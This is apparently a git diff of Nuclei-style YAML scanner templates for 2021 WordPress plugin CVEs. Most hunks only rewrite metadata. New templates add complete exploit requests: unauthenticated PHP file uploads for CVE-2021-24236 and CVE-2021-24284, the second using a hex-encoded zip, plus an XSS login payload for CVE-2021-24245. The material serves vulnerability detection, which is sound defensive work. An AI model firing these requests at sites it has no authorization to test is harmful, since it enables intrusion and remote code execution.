-  description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
+  description: WordPress JH 404 Logger plugin through 1.1 contains a cross-site scripting vulnerability. Referer and path of 404 pages are not properly sanitized when they are output in the WordPress dashboard, which can lead to executing arbitrary JavaScript code.
   reference:
     - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
     - https://wordpress.org/plugins/jh-404-logger/
+    - https://ganofins.com/blog/my-first-cve-2021-24176/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24176
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 5.4
     cve-id: CVE-2021-24176
     cwe-id: CWE-79
-  tags: cve,cve2021,wordpress,wp-plugin,xss
+  tags: cve,cve2021,wordpress,wp-plugin,xss,wpscan
 
 requests:
   - method: GET
@@ -29,4 +31,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-24210.yaml b/cves/2021/CVE-2021-24210.yaml
index 99eeea9bfb..a866cb9404 100644
--- a/cves/2021/CVE-2021-24210.yaml
+++ b/cves/2021/CVE-2021-24210.yaml
@@ -11,20 +11,21 @@ info:
     go to whitelisted pages but it's possible to redirect the victim to any domain.
   reference:
     - https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb
+    - https://plugins.trac.wordpress.org/changeset/2497610/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24210
     cwe-id: CWE-601
-  tags: wordpress,cve,cve2021,redirect
+  tags: cve2021,redirect,wpscan,wordpress,cve
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com"
+      - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
diff --git a/cves/2021/CVE-2021-24226.yaml b/cves/2021/CVE-2021-24226.yaml
index 80cb8fab90..3c60928cca 100644
--- a/cves/2021/CVE-2021-24226.yaml
+++ b/cves/2021/CVE-2021-24226.yaml
@@ -1,11 +1,10 @@
 id: CVE-2021-24226
 
 info:
-  name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage
+  name: AccessAlly <3.5.7 - Sensitive Information Leakage
   author: dhiyaneshDK
   severity: high
-  description: In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which
-    contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required.
+  description: WordPress AccessAlly plugin before 3.5.7 allows sensitive information leakage because the file \"resource/frontend/product/product-shortcode.php\" (which is responsible for the [accessally_order_form] shortcode) dumps serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, and no login or administrator role is required.
   reference:
     - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24226
@@ -14,7 +13,7 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2021-24226
     cwe-id: CWE-200
-  tags: wordpress,cve,cve2021,wp-plugin
+  tags: wordpress,cve,cve2021,wp-plugin,wpscan
 
 requests:
   - method: GET
@@ -32,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/22
diff --git a/cves/2021/CVE-2021-24235.yaml b/cves/2021/CVE-2021-24235.yaml
index 6e86a95b86..7f3c226224 100644
--- a/cves/2021/CVE-2021-24235.yaml
+++ b/cves/2021/CVE-2021-24235.yaml
@@ -1,18 +1,20 @@
 id: CVE-2021-24235
 
 info:
-  name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.
+  description: WordPress Goto Tour & Travel theme before 2.0 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize the keywords and start_date GET parameters on its Tour List page.
   reference:
+    - https://wpscan.com/vulnerability/eece90aa-582b-4c49-8b7c-14027f9df139
+    - https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24235
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24235
     cwe-id: CWE-79
-  tags: cve,cve2021,wordpress,xss,wp-theme
+  tags: xss,wp-theme,wpscan,cve,cve2021,wordpress
 
 requests:
   - method: GET
@@ -36,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-24236.yaml b/cves/2021/CVE-2021-24236.yaml
new file mode 100644
index 0000000000..4c475a51ac
--- /dev/null
+++ b/cves/2021/CVE-2021-24236.yaml
@@ -0,0 +1,86 @@
+id: CVE-2021-24236
+
+info:
+  name: WordPress Plugin Imagements 1.2.5 - Unauthenticated Arbitrary File Upload
+  author: pussycat0x
+  severity: critical
+  description: |
+    The Imagements WordPress plugin through 1.2.5 allows images to be uploaded in comments, however only checks for the Content-Type in the request to forbid dangerous files. This allows unauthenticated attackers to upload arbitrary files by using a valid image Content-Type along with a PHP filename and code, leading to RCE.
+  reference:
+    - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
+    - https://wordpress.org/plugins/imagements/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24236
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-24236
+    cwe-id: CWE-434
+  tags: cve,rce,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive
+
+
+variables:
+  php: "{{to_lower('{{randstr}}')}}.php"
+  post: "1"
+
+requests:
+  - raw:
+      - |
+        POST /wp-comments-post.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+
+        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+        Content-Disposition: form-data; name="comment"
+
+        {{randstr}}
+        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+        Content-Disposition: form-data; name="author"
+
+        {{randstr}}
+        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+        Content-Disposition: form-data; name="email"
+
+        {{randstr}}@email.com
+        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+        Content-Disposition: form-data; name="url"
+
+
+        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+        Content-Disposition: form-data; name="checkbox"
+
+        yes
+        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+        Content-Disposition: form-data; name="naam"
+
+        {{randstr}}
+        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+        Content-Disposition: form-data; name="image"; filename="{{php}}"
+        Content-Type: image/jpeg
+
+        <?php echo 'CVE-2021-24236'; ?>
+
+        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+        Content-Disposition: form-data; name="submit"
+
+        Post Comment
+        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+        Content-Disposition: form-data; name="comment_post_ID"
+
+        {{post}}
+        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+        Content-Disposition: form-data; name="comment_parent"
+
+        0
+        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--
+
+      - |
+        GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "CVE-2021-24236"
diff --git a/cves/2021/CVE-2021-24237.yaml b/cves/2021/CVE-2021-24237.yaml
index f47fd25a1e..14132c94b6 100644
--- a/cves/2021/CVE-2021-24237.yaml
+++ b/cves/2021/CVE-2021-24237.yaml
@@ -1,19 +1,20 @@
 id: CVE-2021-24237
 
 info:
-  name: Realteo WordPress Plugin <= 1.2.3 - Unauthenticated Reflected XSS
+  name: WordPress Realteo <=1.2.3 - Cross-Site Scripting
   author: 0x_Akoko
   severity: medium
-  description: The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius.
+  description: WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page.
   reference:
     - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
     - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24237
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24237
     cwe-id: CWE-79
-  tags: cve,cve2021,realteo,xss,wordpress,plugin
+  tags: cve,cve2021,realteo,xss,wordpress,plugin,wpscan
 
 requests:
   - method: GET
@@ -37,3 +38,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-24245.yaml b/cves/2021/CVE-2021-24245.yaml
new file mode 100644
index 0000000000..9e7991f39e
--- /dev/null
+++ b/cves/2021/CVE-2021-24245.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-24245
+
+info:
+  name: WordPress Stop Spammers <2021.9 - Cross-Site Scripting
+  author: edoardottt
+  severity: medium
+  description: WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags.
+  reference:
+    - https://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html
+    - https://wpscan.com/vulnerability/5e7accd6-08dc-4c6e-9d19-73e2d7e97735
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24245
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-24245
+    cwe-id: CWE-79
+  tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,packetstorm
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP+Cookie+check;
+
+        log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: word
+        part: body
+        words:
+          - "ad\" accesskey=X onclick=alert(1)"
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-24274.yaml b/cves/2021/CVE-2021-24274.yaml
index 009c8ab8fe..3e73bf1e7a 100644
--- a/cves/2021/CVE-2021-24274.yaml
+++ b/cves/2021/CVE-2021-24274.yaml
@@ -1,19 +1,20 @@
 id: CVE-2021-24274
 
 info:
-  name: Ultimate Maps by Supsystic < 1.2.5 - Reflected Cross-Site scripting (XSS)
+  name: WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
+  description: WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute.
   reference:
     - https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d
+    - http://packetstormsecurity.com/files/164316/WordPress-Ultimate-Maps-1.2.4-Cross-Site-Scripting.html
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24274
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24274
     cwe-id: CWE-79
-  tags: wordpress,cve,cve2021,wp-plugin,maps
+  tags: wpscan,packetstorm,wordpress,cve,cve2021,wp-plugin,maps
 
 requests:
   - method: GET
@@ -35,3 +36,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-24275.yaml b/cves/2021/CVE-2021-24275.yaml
index 9cc4f2334d..c6dabd986f 100644
--- a/cves/2021/CVE-2021-24275.yaml
+++ b/cves/2021/CVE-2021-24275.yaml
@@ -1,19 +1,20 @@
 id: CVE-2021-24275
 
 info:
-  name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS)
+  name: Popup by Supsystic <1.10.5 - Cross-Site scripting
   author: dhiyaneshDK
   severity: medium
-  description: The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue.
+  description: WordPress Popup by Supsystic before 1.10.5 did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected cross-site scripting issue.
   reference:
     - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24275
+    - http://packetstormsecurity.com/files/164311/WordPress-Popup-1.10.4-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24275
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24275
     cwe-id: CWE-79
-  tags: wordpress,cve,cve2021,wp-plugin
+  tags: wpscan,packetstorm,wordpress,cve,cve2021,wp-plugin
 
 requests:
   - method: GET
@@ -35,3 +36,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/08/15
diff --git a/cves/2021/CVE-2021-24276.yaml b/cves/2021/CVE-2021-24276.yaml
index 6b03f70df1..ec7218f3a6 100644
--- a/cves/2021/CVE-2021-24276.yaml
+++ b/cves/2021/CVE-2021-24276.yaml
@@ -1,19 +1,20 @@
 id: CVE-2021-24276
 
 info:
-  name: Contact Form by Supsystic < 1.7.15 - Reflected Cross-Site scripting (XSS)
+  name: Contact Form by Supsystic < 1.7.15 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
   description: The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
   reference:
     - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24276
+    - http://packetstormsecurity.com/files/164308/WordPress-Contact-Form-1.7.14-Cross-Site-Scripting.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24276
     cwe-id: CWE-79
-  tags: wordpress,cve,cve2021,wp-plugin
+  tags: wordpress,cve,cve2021,wp-plugin,wpscan,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-24278.yaml b/cves/2021/CVE-2021-24278.yaml
index 05508a9689..e1fa9ff14d 100644
--- a/cves/2021/CVE-2021-24278.yaml
+++ b/cves/2021/CVE-2021-24278.yaml
@@ -1,19 +1,19 @@
 id: CVE-2021-24278
 
 info:
-  name: Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation
+  name: WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation
   author: 2rs3c
   severity: high
-  description: In the Redirection for Contact Form 7 WordPress plugin before 2.3.4, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.
+  description: WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24278
     - https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413
     - https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24278
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-24278
-  tags: cve,cve2021,wordpress,wp-plugin
+  tags: wordpress,wp-plugin,wpscan,cve,cve2021
 
 requests:
   - method: POST
@@ -43,4 +43,6 @@ requests:
       - type: regex
         part: body
         regex:
-          - '"nonce":"[a-f0-9]+"'
\ No newline at end of file
+          - '"nonce":"[a-f0-9]+"'
+
+# Enhanced by mp on 2022/06/22
diff --git a/cves/2021/CVE-2021-24284.yaml b/cves/2021/CVE-2021-24284.yaml
new file mode 100644
index 0000000000..b6fbad17aa
--- /dev/null
+++ b/cves/2021/CVE-2021-24284.yaml
@@ -0,0 +1,69 @@
+id: CVE-2021-24284
+
+info:
+  name: WordPress Kaswara Modern VC Addons - File Upload RCE
+  author: lamscun,pussycat0x,pdteam
+  severity: critical
+  description: |
+    The Kaswara Modern VC Addons WordPress plugin through 3.0.1 allows unauthenticated arbitrary file upload via the 'uploadFontIcon' AJAX action. The supplied zipfile being unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP.
+  reference:
+    - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5
+    - https://github.com/advisories/GHSA-wqvg-8q49-hjc7
+    - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/
+    - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/
+    - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24284
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-24284
+    cwe-id: CWE-434
+  tags: intrusive,unauth,fileupload,wpscan,cve,wordpress,wp-plugin,rce,cve2021,wp
+
+variables:
+  zip_file: "{{to_lower(rand_text_alpha(6))}}"
+  php_file: "{{to_lower(rand_text_alpha(2))}}.php"
+  php_cmd: "<?php phpinfo();?>"
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708
+
+        --------------------------d3be34324392a708
+        Content-Disposition: form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip"
+        Content-Type: application/octet-stream
+
+        {{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}
+        --------------------------d3be34324392a708
+        Content-Disposition: form-data; name="fontsetname"
+
+        {{zip_file}}
+        --------------------------d3be34324392a708
+        Content-Disposition: form-data; name="action"
+
+        uploadFontIcon
+        --------------------------d3be34324392a708--
+
+      - |
+        GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_1
+        words:
+          - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"
+
+      - type: word
+        part: body_2
+        words:
+          - "phpinfo()"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml
index 7bb6a367cd..3e9e5e7902 100644
--- a/cves/2021/CVE-2021-24285.yaml
+++ b/cves/2021/CVE-2021-24285.yaml
@@ -4,16 +4,17 @@ info:
   name: WordPress Car Seller - Auto Classifieds Script - SQL Injection
   author: ShreyaPohekar
   severity: critical
-  description: "The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue."
+  description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue.
   reference:
     - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
     - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
+    - https://codevigilant.com/disclosure/2021/24-04-2021-wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-24285
     cwe-id: CWE-89
-  tags: cve,cve2021,wordpress,wp-plugin,sqli
+  tags: cve2021,wordpress,wp-plugin,sqli,wpscan,cve
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-24288.yaml b/cves/2021/CVE-2021-24288.yaml
index 03abba0392..e7ca796c7e 100644
--- a/cves/2021/CVE-2021-24288.yaml
+++ b/cves/2021/CVE-2021-24288.yaml
@@ -13,15 +13,15 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-24288
     cwe-id: CWE-601
-  tags: wordpress,cve,cve2021,redirect,wp-plugin
+  tags: wpscan,wordpress,cve,cve2021,redirect,wp-plugin
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
+      - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
diff --git a/cves/2021/CVE-2021-24291.yaml b/cves/2021/CVE-2021-24291.yaml
index b858079d0c..8f1b8baa62 100644
--- a/cves/2021/CVE-2021-24291.yaml
+++ b/cves/2021/CVE-2021-24291.yaml
@@ -1,19 +1,21 @@
 id: CVE-2021-24291
 
 info:
-  name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)
+  name: WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting
   author: geeknik
   severity: medium
-  description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both
-    unauthenticated and authenticated users)
+  description: |
+    WordPress Photo Gallery by 10Web plugin before 1.5.69 contains multiple reflected cross-site scripting vulnerabilities via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action, available to both unauthenticated and authenticated users.
   reference:
     - https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
+    - https://packetstormsecurity.com/files/162227/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24291
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24291
     cwe-id: CWE-79
-  tags: cve,cve2021,xss,wordpress,wp-plugin,photo
+  tags: photo,wpscan,packetstorm,cve,cve2021,xss,wordpress,wp-plugin
 
 requests:
   - method: GET
@@ -36,3 +38,5 @@ requests:
           - "onmouseover=alert(document.domain)//"
           - "wp-content/uploads/photo-gallery"
         condition: and
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2021/CVE-2021-24298.yaml b/cves/2021/CVE-2021-24298.yaml
index cad39c9f6c..c0b67c0995 100644
--- a/cves/2021/CVE-2021-24298.yaml
+++ b/cves/2021/CVE-2021-24298.yaml
@@ -1,18 +1,21 @@
 id: CVE-2021-24298
 
 info:
-  name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS
+  description: |
+    WordPress Simple Giveaways plugin before 2.36.2 contains a cross-site scripting vulnerability via the method and share GET parameters of the Giveaway pages, which are not sanitized, validated, or escaped before being output back in the pages.
   reference:
+    - https://codevigilant.com/disclosure/2021/wp-plugin-giveasap-xss/
+    - https://wpscan.com/vulnerability/30aebded-3eb3-4dda-90b5-12de5e622c91
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24298
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24298
     cwe-id: CWE-79
-  tags: cve,cve2021,wordpress,xss,wp-plugin
+  tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin
 
 requests:
   - method: GET
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2021/CVE-2021-24300.yaml b/cves/2021/CVE-2021-24300.yaml
index 33ab74ea05..109f93ea66 100644
--- a/cves/2021/CVE-2021-24300.yaml
+++ b/cves/2021/CVE-2021-24300.yaml
@@ -1,10 +1,10 @@
 id: CVE-2021-24300
 
 info:
-  name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS
+  name: WordPress WooCommerce <1.13.22 - Cross-Site Scripting
   author: cckuailong
   severity: medium
-  description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue.
+  description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter.
   reference:
     - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24300
@@ -13,7 +13,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-24300
     cwe-id: CWE-79
-  tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+  tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan
 
 requests:
   - raw:
@@ -47,3 +47,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml
index 200621ddd9..a08a2f007e 100644
--- a/cves/2021/CVE-2021-24316.yaml
+++ b/cves/2021/CVE-2021-24316.yaml
@@ -1,19 +1,21 @@
 id: CVE-2021-24316
 
 info:
-  name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
+  name: WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting
   author: 0x_Akoko
   severity: medium
-  description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
+  description: WordPress Mediumish theme 1.0.47 and prior contains an unauthenticated reflected cross-site scripting vulnerability. The 's' GET parameter is not properly sanitized by the search feature before it is output back on the page.
   reference:
     - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
     - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
+    - https://www.wowthemes.net/themes/mediumish-wordpress/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24316
   classification:
